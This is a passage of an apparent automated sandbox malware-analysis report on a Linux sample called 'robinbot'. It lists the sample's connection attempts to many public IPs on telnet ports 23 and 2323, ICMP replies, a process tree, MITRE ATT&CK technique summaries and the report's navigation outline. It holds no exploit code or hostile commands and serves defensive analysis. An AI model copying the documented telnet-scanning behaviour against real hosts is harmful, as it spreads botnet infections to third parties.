Nov 29, 2022 16:27:45.268951893 CET	15661	23	192.168.2.20	199.52.67.26
Nov 29, 2022 16:27:45.268956900 CET	15661	2323	192.168.2.20	116.67.119.148
Nov 29, 2022 16:27:45.268955946 CET	15661	23	192.168.2.20	16.209.81.69
Nov 29, 2022 16:27:45.269290924 CET	15661	23	192.168.2.20	14.91.222.3
Nov 29, 2022 16:27:45.269712925 CET	15661	23	192.168.2.20	48.49.247.168
Nov 29, 2022 16:27:45.269731998 CET	15661	23	192.168.2.20	78.78.81.123
Nov 29, 2022 16:27:45.269761086 CET	15661	23	192.168.2.20	208.38.123.178
Nov 29, 2022 16:27:45.269761086 CET	15661	23	192.168.2.20	223.53.210.84
Nov 29, 2022 16:27:45.269794941 CET	15661	2323	192.168.2.20	141.120.197.91
Nov 29, 2022 16:27:45.269794941 CET	15661	23	192.168.2.20	70.23.87.24
Nov 29, 2022 16:27:45.269805908 CET	15661	23	192.168.2.20	61.210.74.156
Nov 29, 2022 16:27:45.269826889 CET	15661	23	192.168.2.20	155.186.78.227
Nov 29, 2022 16:27:45.269826889 CET	15661	23	192.168.2.20	108.92.128.157
Nov 29, 2022 16:27:45.270670891 CET	15661	23	192.168.2.20	135.29.113.127
Nov 29, 2022 16:27:45.270684004 CET	15661	23	192.168.2.20	149.87.229.133
Nov 29, 2022 16:27:45.270709038 CET	15661	23	192.168.2.20	65.131.242.78
Nov 29, 2022 16:27:45.270713091 CET	15661	23	192.168.2.20	104.227.3.213
Nov 29, 2022 16:27:45.270721912 CET	15661	23	192.168.2.20	124.56.170.194
Nov 29, 2022 16:27:45.270739079 CET	15661	23	192.168.2.20	79.2.90.12
Nov 29, 2022 16:27:45.270749092 CET	15661	23	192.168.2.20	84.164.169.219

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Nov 29, 2022 16:27:45.295325041 CET	2.243.179.168	192.168.2.20	913	(Unknown)	Destination Unreachable
Nov 29, 2022 16:27:45.298552036 CET	145.220.78.2	192.168.2.20	ad48	(Unknown)	Destination Unreachable
Nov 29, 2022 16:27:45.300121069 CET	84.164.169.219	192.168.2.20	c12e	(Unknown)	Destination Unreachable
Nov 29, 2022 16:27:45.388153076 CET	104.227.3.213	192.168.2.20	2c8c	(Port unreachable)	Destination Unreachable
Nov 29, 2022 16:27:45.496129990 CET	187.127.3.105	192.168.2.20	7ed0	(Port unreachable)	Destination Unreachable
Nov 29, 2022 16:27:46.302711964 CET	109.250.53.73	192.168.2.20	1c6b	(Unknown)	Destination Unreachable
Nov 29, 2022 16:27:46.315733910 CET	2.100.218.74	192.168.2.20	9c78	(Unknown)	Destination Unreachable
Nov 29, 2022 16:27:46.318825006 CET	100.64.0.1	192.168.2.20	5e56	(Time to live exceeded in transit)	Time Exceeded
Nov 29, 2022 16:27:47.322309017 CET	84.138.185.220	192.168.2.20	b147	(Unknown)	Destination Unreachable
Nov 29, 2022 16:27:47.448013067 CET	184.188.10.149	192.168.2.20	355c	(Time to live exceeded in transit)	Time Exceeded
Nov 29, 2022 16:27:47.545892000 CET	200.186.38.254	192.168.2.20	ff05	(Time to live exceeded in transit)	Time Exceeded
Nov 29, 2022 16:27:47.669383049 CET	100.70.39.242	192.168.2.20	96a1	(Time to live exceeded in transit)	Time Exceeded
Nov 29, 2022 16:27:48.301740885 CET	159.253.60.186	192.168.2.20	96cc	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:27:49.112189054 CET	216.66.27.22	192.168.2.20	be68	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:27:49.203479052 CET	157.90.102.104	192.168.2.20	c38f	(Unknown)	Destination Unreachable
Nov 29, 2022 16:27:49.229221106 CET	212.58.186.154	192.168.2.20	6ecf	(Net unreachable)	Destination Unreachable
Nov 29, 2022 16:27:49.475986958 CET	121.111.229.53	192.168.2.20	f75d	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:27:50.393419981 CET	78.64.114.242	192.168.2.20	6530	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:27:50.510566950 CET	184.64.190.189	192.168.2.20	36d2	(Port unreachable)	Destination Unreachable
Nov 29, 2022 16:27:50.636332035 CET	218.248.109.157	192.168.2.20	7cf1	(Unknown)	Destination Unreachable
Nov 29, 2022 16:27:51.297362089 CET	197.13.3.22	192.168.2.20	d068	(Net unreachable)	Destination Unreachable
Nov 29, 2022 16:27:51.323653936 CET	185.108.141.43	192.168.2.20	3465	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:27:51.374502897 CET	195.229.0.113	192.168.2.20	dc71	(Unknown)	Destination Unreachable
Nov 29, 2022 16:27:51.423990011 CET	184.66.19.102	192.168.2.20	8b7c	(Port unreachable)	Destination Unreachable
Nov 29, 2022 16:27:52.146224976 CET	5.231.144.126	192.168.2.20	2949	(Unknown)	Destination Unreachable
Nov 29, 2022 16:27:52.156313896 CET	78.145.38.77	192.168.2.20	34a8	(Unknown)	Destination Unreachable
Nov 29, 2022 16:27:52.250840902 CET	161.247.129.30	192.168.2.20	4c26	(Net unreachable)	Destination Unreachable
Nov 29, 2022 16:27:52.324526072 CET	58.220.224.154	192.168.2.20	db4a	(Port unreachable)	Destination Unreachable
Nov 29, 2022 16:27:52.397566080 CET	69.139.78.181	192.168.2.20	b20	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:27:53.323477983 CET	178.2.91.212	192.168.2.20	b1d7	(Unknown)	Destination Unreachable
Nov 29, 2022 16:27:53.474448919 CET	209.193.123.242	192.168.2.20	7215	(Time to live exceeded in transit)	Time Exceeded
Nov 29, 2022 16:27:53.943783998 CET	112.188.172.150	192.168.2.20	e485	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:27:54.279351950 CET	212.85.149.2	192.168.2.20	d5b3	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:27:54.386575937 CET	197.215.157.42	192.168.2.20	da5b	(Time to live exceeded in transit)	Time Exceeded
Nov 29, 2022 16:27:54.427923918 CET	108.188.174.0	192.168.2.20	b9c0	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:27:55.238718033 CET	62.145.75.4	192.168.2.20	f1b0	(Net unreachable)	Destination Unreachable
Nov 29, 2022 16:27:55.283649921 CET	10.225.7.93	192.168.2.20	3a6a	(Time to live exceeded in transit)	Time Exceeded
Nov 29, 2022 16:27:55.476638079 CET	202.128.2.149	192.168.2.20	d6f2	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:27:55.770101070 CET	116.212.180.80	192.168.2.20	e8fa	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:27:56.225367069 CET	62.91.100.102	192.168.2.20	1ced	(Unknown)	Destination Unreachable
Nov 29, 2022 16:27:57.213294029 CET	88.146.180.2	192.168.2.20	c7b2	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:27:57.250565052 CET	84.79.234.113	192.168.2.20	80f7	(Port unreachable)	Destination Unreachable
Nov 29, 2022 16:27:57.547262907 CET	95.117.33.24	192.168.2.20	3f21	(Unknown)	Destination Unreachable
Nov 29, 2022 16:27:57.806675911 CET	59.150.104.134	192.168.2.20	ea26	(Time to live exceeded in transit)	Time Exceeded
Nov 29, 2022 16:27:57.841708899 CET	140.119.243.5	192.168.2.20	603d	(Time to live exceeded in transit)	Time Exceeded
Nov 29, 2022 16:27:59.115823984 CET	84.131.52.222	192.168.2.20	364d	(Unknown)	Destination Unreachable
Nov 29, 2022 16:27:59.121828079 CET	185.18.150.110	192.168.2.20	fd2e	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:27:59.229054928 CET	168.244.174.85	192.168.2.20	4997	(Time to live exceeded in transit)	Time Exceeded
Nov 29, 2022 16:28:00.655702114 CET	68.234.193.158	192.168.2.20	8ffe	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:28:14.013925076 CET	125.103.207.168	192.168.2.20	384c	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:29:05.264163971 CET	73.67.181.193	192.168.2.20	e83c	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:29:05.271523952 CET	73.67.181.193	192.168.2.20	e83c	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:29:05.271559000 CET	73.67.181.193	192.168.2.20	e83c	(Host unreachable)	Destination Unreachable
Nov 29, 2022 16:29:05.271574974 CET	73.67.181.193	192.168.2.20	e83c	(Host unreachable)	Destination Unreachable

System Behavior

Analysis Process: robinbot PID: 9446, Parent PID: 9378

General

Start time:	16:27:44
Start date:	29/11/2022
Path:	/tmp/robinbot
Arguments:	/tmp/robinbot
File size:	0 bytes
MD5 hash:	unknown

Analysis Process: robinbot PID: 9447, Parent PID: 9446

General

Start time:	16:27:44
Start date:	29/11/2022
Path:	/tmp/robinbot
Arguments:	n/a
File size:	0 bytes
MD5 hash:	unknown

Analysis Process: robinbot PID: 9448, Parent PID: 9447

General

Start time:	16:27:44
Start date:	29/11/2022
Path:	/tmp/robinbot
Arguments:	n/a
File size:	0 bytes
MD5 hash:	unknown

Analysis Process: robinbot PID: 9449, Parent PID: 9447

General

Start time:	16:27:44
Start date:	29/11/2022
Path:	/tmp/robinbot
Arguments:	n/a
File size:	0 bytes
MD5 hash:	unknown

Analysis Process: robinbot PID: 9450, Parent PID: 9447

General

Start time:	16:27:44
Start date:	29/11/2022
Path:	/tmp/robinbot
Arguments:	n/a
File size:	0 bytes
MD5 hash:	unknown

Analysis Process: robinbot PID: 9451, Parent PID: 9450

General

Start time:	16:27:44
Start date:	29/11/2022
Path:	/tmp/robinbot
Arguments:	n/a
File size:	0 bytes
MD5 hash:	unknown

Analysis Process: upstart PID: 9461, Parent PID: 3310

General

Start time:	16:27:51
Start date:	29/11/2022
Path:	/sbin/upstart
Arguments:	n/a
File size:	0 bytes
MD5 hash:	unknown

Analysis Process: sh PID: 9461, Parent PID: 3310

General

Start time:	16:27:51
Start date:	29/11/2022
Path:	/bin/sh
Arguments:	/bin/sh -e /proc/self/fd/9
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Analysis Process: sh PID: 9470, Parent PID: 9461

General

Start time:	16:27:51
Start date:	29/11/2022
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Analysis Process: date PID: 9470, Parent PID: 9461

General

Start time:	16:27:51
Start date:	29/11/2022
Path:	/bin/date
Arguments:	date
File size:	68464 bytes
MD5 hash:	54903b613f9019bfca9f5d28a4fff34e

Analysis Process: sh PID: 9472, Parent PID: 9461

General

Start time:	16:27:51
Start date:	29/11/2022
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Analysis Process: apport-checkreports PID: 9472, Parent PID: 9461

General

Start time:	16:27:51
Start date:	29/11/2022
Path:	/usr/share/apport/apport-checkreports
Arguments:	/usr/bin/python3 /usr/share/apport/apport-checkreports --system
File size:	1269 bytes
MD5 hash:	1a7d84ebc34df04e55ca3723541f48c9

Analysis Process: upstart PID: 9488, Parent PID: 3310

General

Start time:	16:27:51
Start date:	29/11/2022
Path:	/sbin/upstart
Arguments:	n/a
File size:	0 bytes
MD5 hash:	unknown

Analysis Process: sh PID: 9488, Parent PID: 3310

General

Start time:	16:27:51
Start date:	29/11/2022
Path:	/bin/sh
Arguments:	/bin/sh -e /proc/self/fd/9
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Analysis Process: sh PID: 9490, Parent PID: 9488

General

Start time:	16:27:51
Start date:	29/11/2022
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Analysis Process: date PID: 9490, Parent PID: 9488

General

Start time:	16:27:51
Start date:	29/11/2022
Path:	/bin/date
Arguments:	date
File size:	68464 bytes
MD5 hash:	54903b613f9019bfca9f5d28a4fff34e

Analysis Process: sh PID: 9499, Parent PID: 9488

General

Start time:	16:27:51
Start date:	29/11/2022
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Analysis Process: apport-gtk PID: 9499, Parent PID: 9488

General

Start time:	16:27:51
Start date:	29/11/2022
Path:	/usr/share/apport/apport-gtk
Arguments:	/usr/bin/python3 /usr/share/apport/apport-gtk
File size:	23806 bytes
MD5 hash:	ec58a49a30ef6a29406a204f28cc7d87

Analysis Process: upstart PID: 9515, Parent PID: 3310

General

Start time:	16:27:52
Start date:	29/11/2022
Path:	/sbin/upstart
Arguments:	n/a
File size:	0 bytes
MD5 hash:	unknown

Analysis Process: sh PID: 9515, Parent PID: 3310

General

Start time:	16:27:52
Start date:	29/11/2022
Path:	/bin/sh
Arguments:	/bin/sh -e /proc/self/fd/9
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Analysis Process: sh PID: 9517, Parent PID: 9515

General

Start time:	16:27:52
Start date:	29/11/2022
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Analysis Process: date PID: 9517, Parent PID: 9515

General

Start time:	16:27:52
Start date:	29/11/2022
Path:	/bin/date
Arguments:	date
File size:	68464 bytes
MD5 hash:	54903b613f9019bfca9f5d28a4fff34e

Analysis Process: sh PID: 9532, Parent PID: 9515

General

Start time:	16:27:52
Start date:	29/11/2022
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Analysis Process: apport-gtk PID: 9532, Parent PID: 9515

General

Start time:	16:27:52
Start date:	29/11/2022
Path:	/usr/share/apport/apport-gtk
Arguments:	/usr/bin/python3 /usr/share/apport/apport-gtk
File size:	23806 bytes
MD5 hash:	ec58a49a30ef6a29406a204f28cc7d87

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report robinbot

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/var/crash/_usr_share_apport_apport-checkreports.1000.crash

/var/crash/_usr_share_apport_apport-gtk.1000.crash

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Symbols

Network Behavior

Network Port Distribution

TCP Packets

ICMP Packets

System Behavior

Analysis Process: robinbot PID: 9446, Parent PID: 9378

General

Analysis Process: robinbot PID: 9447, Parent PID: 9446

General

Analysis Process: robinbot PID: 9448, Parent PID: 9447

General

Analysis Process: robinbot PID: 9449, Parent PID: 9447

General

Analysis Process: robinbot PID: 9450, Parent PID: 9447

General

Analysis Process: robinbot PID: 9451, Parent PID: 9450

General

Analysis Process: upstart PID: 9461, Parent PID: 3310

General

Analysis Process: sh PID: 9461, Parent PID: 3310

General

Analysis Process: sh PID: 9470, Parent PID: 9461

Linux Analysis Report
robinbot